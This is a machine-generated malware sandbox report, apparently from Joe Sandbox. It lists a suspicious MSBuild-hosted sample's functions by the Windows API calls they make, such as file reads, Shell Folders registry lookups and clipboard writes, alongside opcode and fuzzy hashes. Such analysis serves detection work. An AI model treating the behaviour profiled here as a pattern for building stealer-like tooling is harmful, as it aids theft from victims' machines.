                                                                                                                                                                                    • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                                                    • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                    • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                    • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                    • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                                                    • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                    • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                    • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                    • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                                                    • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                    • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: EnumNamesResource
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3334572018-0
                                                                                                                                                                                    • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                    • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                                                    • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                    • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                    • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                                                    • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseFind
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1863332320-0
                                                                                                                                                                                    • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                    • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                                                    • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Open
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 71445658-0
                                                                                                                                                                                    • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                    • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                                                                    • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                    • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                    • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                    • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                    • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                                                                                                    • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                                                                    • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                                                                                                    • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004095FC
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                      • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                                      • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                      • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3655998216-0
                                                                                                                                                                                    • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                    • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                                                    • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                    • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00445426
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1828521557-0
                                                                                                                                                                                    • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                    • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                                                    • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                                                      • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@FilePointermemcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 609303285-0
                                                                                                                                                                                    • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                                    • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                                                                    • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcsicmp
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2081463915-0
                                                                                                                                                                                    • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                                    • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                                                    • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2136311172-0
                                                                                                                                                                                    • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                    • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                                                    • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@??3@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1936579350-0
                                                                                                                                                                                    • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                                                                                    • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                                                                    • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                                    • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                                    • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                                                                    • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                                    • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                                    • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                                                    • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                                                    • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                                    • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                                                                                                    • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                                                                                                                    • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                                                                                                    • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00409974
                                                                                                                                                                                    • CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3604893535-0
                                                                                                                                                                                    • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                    • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 00409882
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040988F
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                                                                                    • CloseClipboard.USER32 ref: 004098D7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1213725291-0
                                                                                                                                                                                    • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                                                    • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                                                                                    • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                    • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                                                    • free.MSVCRT ref: 00418370
                                                                                                                                                                                      • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                                      • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                                                                    • String ID: OsError 0x%x (%u)
                                                                                                                                                                                    • API String ID: 2360000266-2664311388
                                                                                                                                                                                    • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                                                    • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
